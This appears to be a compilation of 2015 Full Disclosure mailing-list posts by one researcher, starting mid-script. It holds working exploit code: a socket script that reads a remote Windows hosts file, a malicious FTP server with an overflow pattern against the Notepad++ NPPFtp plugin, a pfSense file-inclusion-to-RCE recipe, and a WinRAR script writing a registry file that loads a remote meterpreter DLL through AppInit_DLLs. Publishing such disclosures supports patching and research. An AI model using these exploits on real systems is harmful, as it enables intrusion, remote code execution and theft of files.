banner += "  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner



IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) 
+ end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
data = s.recv(261) # Get header
while data:
data = s.recv(2048)
print data

except Exception:
print "[+] https://www.infogen.al/ [+]"
finally:
s.close()
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Notepad ++ NPPFtp Plugin Buffer Overflow

[Rio Sherri]

# Title : Notepad ++ NPPFtp Plugin Buffer Overflow
# Date : 19/12/2015
# Author : R-73eN
# Tested on : NPPFtp 0.26.3 (Latest Version)
# Software : http://sourceforge.net/projects/nppftp/
# Vendor : https://notepad-plus-plus.org/
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
# A buffer overflow exists in the NPPftp plugin. When the plugin is connected to a malicious server
# which server a crafted LIST response causes the application to crash.
#
# How to reproduce
#
# 1. Start this python server
# 2. Open Notepad ++ , go to plugins , NPPFtp, Show windows
# 3. Click on the gear button to create a new connection.
# 4. Create the connection to connect to the server.
# 5. Connect and the application will crash.

import os,socket,threading,time
allow_delete = False
local_ip = "192.168.1.121"#socket.gethostbyname(socket.gethostname())
local_port = 21
currdir=os.path.abspath('.')

buff = "rwxrwxrwx   1 1 00" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0

[FD] PFSense <= 2.2.5 Directory Traversal

[Rio Sherri]

# Title : PFSense  <= 2.2.5 Directory Traversal
# Date : 18/12/2015
# Author : R-73eN
# Tested on : PFSense 2.2.5
# Software : https://github.com/pfsense/pfsense
# Vendor : https://pfsense.org/
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#
# Fix provided by the vendor 
https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
#
#


In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered the 
following vulnerabilities in the pfsense Webgui.

The following files are vulnerable to a file inclusion attack

wizard.php?xml=
pkg.php?xml=

Both of this files do not sanitize the path of the xml parameter and we can 
load xml files, and loading a special crafted xml file we can gain command 
execution.

Example:
1.xml (the filename can be whatever .txt , .jpg etc because it does not check 
for the file extension)

The content of the 1.xml should be:



12

1
LFI example 
Lfi example 
on
step1_submitphpaction();
/etc/passwd



the parameter  is passed to a require_once() function which 
triggers the File inclusion Attack.
As we all know File inclusion attack can be converted to  RCE  very easily.

Then visiting

http://vulnhost/wizard.php?xml=../../../1.xml

where the "xml" parameter is the path of the crafted file, will trigger the 
vulnerability.

Thanks
Rio Sherri
https://www.infogen.al/ - Infogen AL
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] GoAutoDial CE 3.3 Multiple SQL injections, Command Injection

[Rio Sherri]

goautodial
Description: Binary data

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WinRar Settings Import Command Execution

[Rio Sherri]

#!/usr/bin/python -w

# Title : WinRar Settings Import Command Execution

# Date : 02/10/2015

# Author : R-73eN

# Tested on : Windows 7 Ultimate

# Vulnerable Versions : Winrar < 5.30 beta 4

# The vulnerability exists in the "Import Settings From File" function.

# Since Settings file of Winrar are saved as a registry file and WinRar
executes

# it in an automatic way without checking if it is writing to the Registry
keys

# used by winrar, we can create a specially crafted settings file and we
can

# overwrite registry keys.

# Since we have access to registry there are various ways we could use this
to

# get code execution such as defining "RUN" keys or creating new services
etc

# However the best way to get code execution is using AppInit DLLs

# AppInit DLLs are DLLs that are loaded into any process when it starts.

# In this case, we can specify a meterpreter DLL payload using a UNC path on

# an SMB server we control and then next time a new process starts we will

# get a shell.

# Read more about AppInit Dlls :
https://support.microsoft.com/en-us/kb/197571

#

# Triggering the vulnerability

# 1) Run this python script.

# 2) Open WinRar

# 3) Click Options

# 4) Click Import/Export

# 5) Import Settings from file

# 6) Select the Specially crafted Settings.reg file

#

# Disclosure Timeline:

# 01/10/2015 - Vendor Contacted POC provided

# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify

# presence of [HKEY_CURRENT_USER\Software\WinRAR] or

# [HKEY_CURRENT_USER\Software\WinRAR\

#

#


banner = ""

banner +=" ___ __  _ _ \n"

banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"

banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"

banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"

banner +=" |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_|\n\n"

print banner

print "[+] WinRar Settings Import Command Execution [+]\n"

dll = raw_input("[+] Enter dll location (smb) : ")

dll = dll.replace("\\","")

print "[+] Writing Contet To Settings.reg [+]"

evil = 'Windows Registry Editor Version
5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll +
'"\n"LoadAppInit_DLLs"=dword:0001\n'

print evil

f = open("Settings.reg","w")

f.write(evil)

f.close()

print "[+] Settings.reg created successfully [+]"

print "\n https://www.infogen.al/ \n"

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/